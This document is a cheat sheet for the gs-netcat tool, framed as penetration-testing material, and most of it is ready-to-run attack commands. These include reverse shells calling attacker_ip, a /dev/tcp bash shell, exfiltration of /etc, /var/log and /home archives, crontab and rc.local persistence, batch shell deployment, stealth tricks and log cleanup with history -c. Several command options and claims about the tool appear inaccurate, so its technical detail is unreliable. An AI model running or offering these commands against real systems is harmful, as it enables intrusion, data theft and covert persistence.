Global Socket

Overview

Global Socket (gs-netcat) is an advanced network tool designed for creating encrypted, peer-to-peer reverse shell connections that work across Network Address Translation (NAT) and firewall boundaries without requiring open ports or external command-and-control infrastructure. It uses a shared secret key mechanism to establish secure channels between systems, making it particularly useful for red team operations, penetration testing, and network pivoting in restricted environments.

Gsocket creates secure, encrypted connections with perfect forward secrecy using EC25519 elliptic curve cryptography and AES-256-GCM for encryption. It’s cross-platform compatible (Linux, macOS, Windows/Cygwin) and requires no external dependencies beyond standard libraries.

Installation

Linux Installation

# Install dependencies
sudo apt-get update
sudo apt-get install build-essential git zlib1g-dev libssl-dev

# Clone and build
git clone https://github.com/hackerschoice/gsocket.git
cd gsocket
./autogen.sh
./configure
make
sudo make install

# Verify installation
gs-netcat -h

macOS Installation

# Using Homebrew
brew tap hackerschoice/gsocket
brew install gsocket

# Or build from source
git clone https://github.com/hackerschoice/gsocket.git
cd gsocket
./autogen.sh
./configure
make
sudo make install

Compilation from Source

# Install build tools
# Debian/Ubuntu
sudo apt-get install autoconf automake libtool pkg-config

# macOS
brew install autoconf automake libtool pkg-config

# Build
git clone https://github.com/hackerschoice/gsocket.git
cd gsocket
./autogen.sh
./configure --prefix=$HOME/.local
make
make install

# Add to PATH
export PATH=$HOME/.local/bin:$PATH

Portable Compilation

# Statically linked binary
cd gsocket
./autogen.sh
./configure --enable-static LDFLAGS=-static
make LDFLAGS=-static

# Results in portable binary: gs-netcat
file ./gs-netcat

Basic Reverse Shell

Simple Listener Setup

# Create listener with shared secret
gs-netcat -l -s "MySecurePassword123"

# Listen on all interfaces (default)
# Accepts connections from gsocket clients using same secret
# Output shows connection established

Establishing Reverse Shell

# From target system, connect back
gs-netcat -s "MySecurePassword123" <listener-ip>

# Establishes encrypted tunnel to listener
# Listener receives shell prompt immediately
# All traffic encrypted end-to-end

Complete Workflow

# Terminal 1: Start listener (attacker machine)
gs-netcat -l -s "SHARE_ME_SECRET"
# Waiting for connection...

# Terminal 2: From target system
gs-netcat -s "SHARE_ME_SECRET" 192.168.1.100
# (Automatic reverse shell drops to attacker terminal 1)

Command Reference

Basic Commands

Option	Description	Example
-l	Listen mode (server)	gs-netcat -l -s secret
-s	Shared secret key	gs-netcat -s “password”
-i	Input file (piped commands)	gs-netcat -s secret host -i commands.txt
-e	Execute program	gs-netcat -l -s secret -e /bin/bash
-p	Port (default 1337)	gs-netcat -l -s secret -p 8888
-q	Quiet mode	gs-netcat -q -s secret host
-v	Verbose mode	gs-netcat -v -s secret host
-x	Execute once (single client)	gs-netcat -l -s secret -x -e /bin/sh

Advanced Options

# Show version
gs-netcat -V

# Use specific network interface
gs-netcat -l -s secret -I eth0

# Set connection timeout (seconds)
gs-netcat -s secret -t 30 host

# Use IPv6 only
gs-netcat -l -s secret -6

# Use IPv4 only
gs-netcat -l -s secret -4

Reverse Shell Techniques

Bash Reverse Shell

# Direct bash shell execution
gs-netcat -l -s "SuperSecret" -e /bin/bash

# From target
gs-netcat -s "SuperSecret" attacker_ip

# Interactive bash shell received

Multiple Client Listener

# Accept multiple connections
gs-netcat -l -s "MySecret" -e /bin/bash

# Each connecting client gets a shell
# Handle multiple penetration vectors simultaneously

Single-Use Listener

# Accept one connection then exit
gs-netcat -l -s "OneTime" -x -e /bin/bash

# Useful for one-off operations
# Listener automatically closes after client connects

Command Execution Without Shell

# Execute specific command
gs-netcat -l -s "Secret" -e /bin/sh -c "id; whoami; pwd"

# Execute and close
# Useful for quick information gathering

Network Pivoting

Multi-Hop Pivoting

# Scenario: Compromised machine on internal network
# 1. Establish initial reverse shell to attacker
gs-netcat -s "hop1_secret" attacker_ip

# 2. From compromised machine, scan internal network
nmap -sV 192.168.1.0/24

# 3. Pivot to second target through first compromise
ssh -o ProxyCommand='gs-netcat -s hop1_secret attacker_ip' user@192.168.1.50

# 4. Establish second reverse shell from second target
gs-netcat -s "hop2_secret" attacker_ip

Data Exfiltration

# Listener on attacker machine
gs-netcat -l -s "ExfilSecret"

# From compromised target, pipe data
cat sensitive_file.txt | gs-netcat -s "ExfilSecret" attacker_ip

# Alternative: receive file
gs-netcat -l -s "FileSend" > received_data.bin
gs-netcat -s "FileSend" attacker_ip < data_to_send.bin

Port Forwarding Through Gsocket

# Forward traffic through encrypted tunnel
# Attacker setup
gs-netcat -l -s "Tunnel" -p 9999

# Target connects and forwards traffic
gs-netcat -s "Tunnel" attacker_ip -L 192.168.1.100:80

# Attacker can now access target's internal web server
curl http://localhost:9999

Stealth Techniques

Non-Standard Ports

# Use non-obvious port to avoid detection
gs-netcat -l -s "Secret" -p 53    # DNS port
gs-netcat -l -s "Secret" -p 443   # HTTPS port
gs-netcat -l -s "Secret" -p 123   # NTP port

# Connect using same port
gs-netcat -s "Secret" -p 53 attacker_ip
gs-netcat -s "Secret" -p 443 attacker_ip

Obfuscation Techniques

# Run as different process name
gs-netcat -l -s "Secret" -e /bin/bash &
disown
ps aux | grep -v grep | grep gs-netcat || echo "Hidden"

# Use in background
nohup gs-netcat -l -s "Secret" -e /bin/bash > /dev/null 2>&1 &

# Connection via non-standard interface
gs-netcat -l -s "Secret" -I eth0:1

Long-Duration Listener

# Persistent listener for multiple connections
while true; do
  gs-netcat -l -s "Persistent" -e /bin/bash
  sleep 5
done &

# Restarts automatically if connection drops

Automation and Integration

Reverse Shell One-Liner

# Common payload for shell injection
gs-netcat -s "AttackerSecret" attacker_ip.com

# Full reverse shell chain
bash -i >& /dev/tcp/attacker_ip/port 0>&1 &
gs-netcat -s "secret" attacker_ip &

# With timeout
timeout 300 gs-netcat -s "secret" attacker_ip -e /bin/bash

Automated Listener Script

#!/bin/bash
# listener.sh - Multi-secret listener

SECRETS=("secret1" "secret2" "secret3")
PORT=1337

for SECRET in "${SECRETS[@]}"; do
  echo "[*] Starting listener for secret: $SECRET"
  gs-netcat -l -s "$SECRET" -p $PORT -e /bin/bash &
  ((PORT++))
done

wait

Batch Reverse Shell Deployment

#!/bin/bash
# deploy_shells.sh - Deploy to multiple targets

TARGETS=("192.168.1.10" "192.168.1.20" "192.168.1.30")
SECRET="CompanyWideSecret"
ATTACKER_IP="192.168.100.50"

for TARGET in "${TARGETS[@]}"; do
  echo "[*] Deploying to $TARGET"
  ssh root@$TARGET "gs-netcat -s '$SECRET' $ATTACKER_IP -e /bin/bash &"
done

# Start listener
gs-netcat -l -s "$SECRET" -e /bin/bash

Traffic Analysis and Monitoring

Network Monitoring

# Capture gsocket traffic for analysis
sudo tcpdump -i eth0 'port 1337' -A

# Monitor established connections
netstat -tan | grep 1337

# Check for running gsocket instances
ps aux | grep gs-netcat

Verbose Logging

# Enable verbose output for debugging
gs-netcat -v -l -s "Secret" -e /bin/bash

# Capture connection details
gs-netcat -v -s "Secret" attacker_ip 2>&1 | tee connection.log

Secure Key Management

Secret Generation

# Generate strong random secrets
openssl rand -hex 32 | head -c 64

# Create secret from passphrase
echo -n "MyCompanyPassword" | md5sum

# Use password manager integration
pass generate gsocket_secret 64

Secret Distribution

# Secure channel only - never plain text
# Option 1: Out-of-band delivery (phone, encrypted message)
# Option 2: Pre-shared key infrastructure
# Option 3: Key exchange via authenticated channel

# Example: Pre-position secret in deployment
ssh-keygen -t ed25519 -f /tmp/deploy_key
ssh-copy-id -i /tmp/deploy_key user@target

# Then use in script
gs-netcat -s "$PREPOSITIONED_SECRET" attacker_ip

Practical Penetration Testing Scenarios

Post-Exploitation Persistence

# Add to crontab for persistent callback
crontab -e
# Add line:
*/5 * * * * /usr/local/bin/gs-netcat -s "PersistentSecret" attacker_ip -e /bin/bash > /dev/null 2>&1

# Or add to rc.local
echo "gs-netcat -s 'PersistentSecret' attacker_ip -e /bin/bash &" | sudo tee -a /etc/rc.local

Lateral Movement

# From initial compromise, scan network
gs-netcat -l -s "Initial" -e /bin/bash
# (attacker executes from shell)
nmap -p 22 192.168.1.0/24
nmap -p 3389 192.168.1.0/24

# SSH into discovered system via gsocket tunnel
ssh -o ProxyCommand='gs-netcat -s Initial attacker_ip' user@192.168.1.100

# Establish reverse shell from new system
gs-netcat -s "Lateral2" attacker_ip -e /bin/bash

Data Exfiltration Chain

# Compress sensitive data
tar czf sensitive_data.tar.gz /etc /var/log /home

# Exfiltrate via gsocket
cat sensitive_data.tar.gz | gs-netcat -s "Exfil" attacker_ip

# Receive on attacker side
gs-netcat -l -s "Exfil" > stolen_data.tar.gz

# Verify integrity
md5sum stolen_data.tar.gz

Troubleshooting

Connection Issues

Problem	Diagnosis	Solution
Connection refused	Listener not running	Start gs-netcat -l first
Timeout	Port blocked	Try different port with -p
Secret mismatch	Wrong key	Verify secret matches exactly
Host unreachable	Network issue	Check routing, check firewall

Debugging Connection Problems

# Verbose mode for diagnostics
gs-netcat -v -s "Secret" attacker_ip

# Check if port is listening
netstat -tlnp | grep 1337

# Test connectivity
nc -zv attacker_ip 1337

# Check firewall rules
sudo iptables -L -n -v

Security Considerations

Encryption Strength

Gsocket Security Properties:
- Key Exchange: Curve25519
- Encryption: AES-256-GCM (AEAD)
- Forward Secrecy: Perfect Forward Secrecy (PFS)
- Authentication: HMAC-based authentication
- No central authority required

Best Practices

# 1. Use strong, random secrets (64+ characters)
SECRET=$(openssl rand -hex 32)

# 2. Change secrets between different operations
gs-netcat -s "Secret1" attacker_ip    # Initial access
gs-netcat -s "Secret2" attacker_ip    # Data exfil
gs-netcat -s "Secret3" attacker_ip    # Persistence

# 3. Use different secrets per target
gs-netcat -s "Target_1_Secret" attacker_ip
gs-netcat -s "Target_2_Secret" attacker_ip

# 4. Clean up after operations
pkill -f gs-netcat
rm -f ~/.gsocket_*
history -c

Legal and Ethical Considerations

# CRITICAL: Only use on systems you own or have explicit permission
# - Obtain written authorization before testing
# - Only test within scope of engagement
# - Use in controlled lab environment first
# - Document all activities
# - Report findings responsibly
# - Comply with CFAA and local laws

# Example authorization check:
# 1. Verify Rules of Engagement (ROE)
# 2. Confirm target IP in scope
# 3. Review legal agreement
# 4. Set start/end dates
# 5. Identify points of contact

Advanced Topics

Custom Encryption Parameters

# Gsocket uses hardcoded strong crypto
# Parameters cannot be changed (by design)
# This prevents weak implementations

# Verify crypto details
strings $(which gs-netcat) | grep -i "aes\|curve"

Performance Optimization

# Large data transfer optimization
# Pipe large files efficiently
dd if=/large/file | gs-netcat -s "Secret" attacker_ip
pv /large/file | gs-netcat -s "Secret" attacker_ip

# Compression before transfer
tar czf - /data | gs-netcat -s "Secret" attacker_ip

# Monitor transfer speed
# On attacker: pv > output.bin < input-from-gs

Resources and References

• Official GitHub: https://github.com/hackerschoice/gsocket
• Documentation: https://www.gsocket.io/
• Security Analysis: https://www.gsocket.io/security
• Curve25519: https://en.wikipedia.org/wiki/Curve25519
• AES-GCM: https://en.wikipedia.org/wiki/Galois/Counter_Mode
• Related Tools: Ngrok, Reverse SSH, Metasploit